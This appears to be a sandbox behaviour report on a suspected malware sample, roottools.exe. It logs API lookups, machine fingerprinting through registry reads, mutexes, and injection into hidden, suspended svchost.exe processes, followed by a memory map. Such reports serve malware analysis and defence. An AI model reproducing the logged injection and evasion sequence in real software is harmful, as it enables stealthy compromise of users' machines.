| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x75ad0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x75690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId |
|
1 | |
| System | Get Info | type = Operating System |
|
3 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x77d0ce41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x77cd00a4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x77ccf9d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77cd1314 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x77cd19b0 |
|
1 | |
| File | Create | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = extended |
|
1 | |
| Mutex | Create | mutex_name = C2E6ECE9938A43206F172A85684E36DB |
|
1 | |
| Mutex | Open | mutex_name = 9B4D68961731FE3C22DA08B640799EB6, desired_access = SYNCHRONIZE |
|
1 | |
| Mutex | Open | mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE |
|
2 | |
| Process | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x320, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Mutex | Create | mutex_name = 4786CF0F1E6E9E20640CE4A22DFFC997 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 |
|
1 | |
| Thread | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY |
|
1 | |
| Mutex | Open | mutex_name = 20BC29E135FB9B01285187E3B5593CC8, desired_access = SYNCHRONIZE |
|
2 | |
| Process | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x7f8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Mutex | Create | mutex_name = 35D65C8FBCA06952705002450D6712FC |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 |
|
1 | |
| Thread | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY |
|
1 |
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\syswow64\svchost.exe |
| Command Line | C:\Windows\SysWOW64\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:05:12, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:05:01 |
| Information | Value |
|---|---|
| PID | 0x320 |
| Parent PID | 0x6a4 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7C4
0x
11C
0x
420
0x
318
0x
31C
0x
394
0x
310
0x
30C
0x
5B0
0x
7D0
0x
68C
0x
6BC
0x
650
0x
6E0
0x
478
0x
684
0x
464
0x
46C
0x
708
0x
704
0x
770
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| imm32.dll | 0x00020000 | 0x0003dfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00031fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x0008bfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| rsaenh.dll | 0x000f0000 | 0x0012bfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| windowsshell.manifest | 0x00100000 | 0x00100fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000100000 | 0x00100000 | 0x00100fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000110000 | 0x00110000 | 0x00111fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | Readable, Writable |
|
|
|
|
| index.dat | 0x00120000 | 0x0012ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| index.dat | 0x00130000 | 0x0013bfff | Memory Mapped File | Readable, Writable |
|
|
|
|
| index.dat | 0x00140000 | 0x00147fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| index.dat | 0x00150000 | 0x0015ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x0017ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000150000 | 0x00150000 | 0x00150fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x001d0000 | 0x00236fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002d0000 | 0x002d0000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000300000 | 0x00300000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000370000 | 0x00370000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003c0000 | 0x003c0000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004d0000 | 0x004d0000 | 0x0050ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000520000 | 0x00520000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000580000 | 0x00580000 | 0x00707fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000710000 | 0x00710000 | 0x00890fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000008e0000 | 0x008e0000 | 0x0091ffff | Private Memory | Readable, Writable |
|
|
|
|
| svchost.exe | 0x00960000 | 0x00967fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000970000 | 0x00970000 | 0x01d6ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001d70000 | 0x01d70000 | 0x02162fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002170000 | 0x02170000 | 0x023cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002170000 | 0x02170000 | 0x021affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000021d0000 | 0x021d0000 | 0x0220ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002210000 | 0x02210000 | 0x0224ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002280000 | 0x02280000 | 0x022bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022c0000 | 0x022c0000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002300000 | 0x02300000 | 0x0233ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002350000 | 0x02350000 | 0x023cffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x023d0000 | 0x0269efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000026e0000 | 0x026e0000 | 0x0271ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002720000 | 0x02720000 | 0x0275ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002790000 | 0x02790000 | 0x027cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000027d0000 | 0x027d0000 | 0x0280ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002810000 | 0x02810000 | 0x0284ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002850000 | 0x02850000 | 0x0288ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000028c0000 | 0x028c0000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002950000 | 0x02950000 | 0x0298ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002990000 | 0x02990000 | 0x02b6ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002990000 | 0x02990000 | 0x02a8ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002a90000 | 0x02a90000 | 0x02acffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002b30000 | 0x02b30000 | 0x02b6ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002ba0000 | 0x02ba0000 | 0x02bdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002c00000 | 0x02c00000 | 0x02c3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002c40000 | 0x02c40000 | 0x02deffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002c40000 | 0x02c40000 | 0x02ceffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002c50000 | 0x02c50000 | 0x02c8ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002ca0000 | 0x02ca0000 | 0x02cdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002ce0000 | 0x02ce0000 | 0x02ceffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002cf0000 | 0x02cf0000 | 0x02d9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002d50000 | 0x02d50000 | 0x02d8ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002de0000 | 0x02de0000 | 0x02deffff | Private Memory | Readable, Writable |
|
|
|
|
| wow64cpu.dll | 0x743d0000 | 0x743d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x743e0000 | 0x7443bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74440000 | 0x7447efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasadhlp.dll | 0x75300000 | 0x75305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nlaapi.dll | 0x75310000 | 0x7531ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasman.dll | 0x75320000 | 0x75334fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasapi32.dll | 0x75340000 | 0x75391fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| schannel.dll | 0x753a0000 | 0x753d9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| userenv.dll | 0x753e0000 | 0x753f6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dnsapi.dll | 0x75400000 | 0x75443fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntmarta.dll | 0x75450000 | 0x75470fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
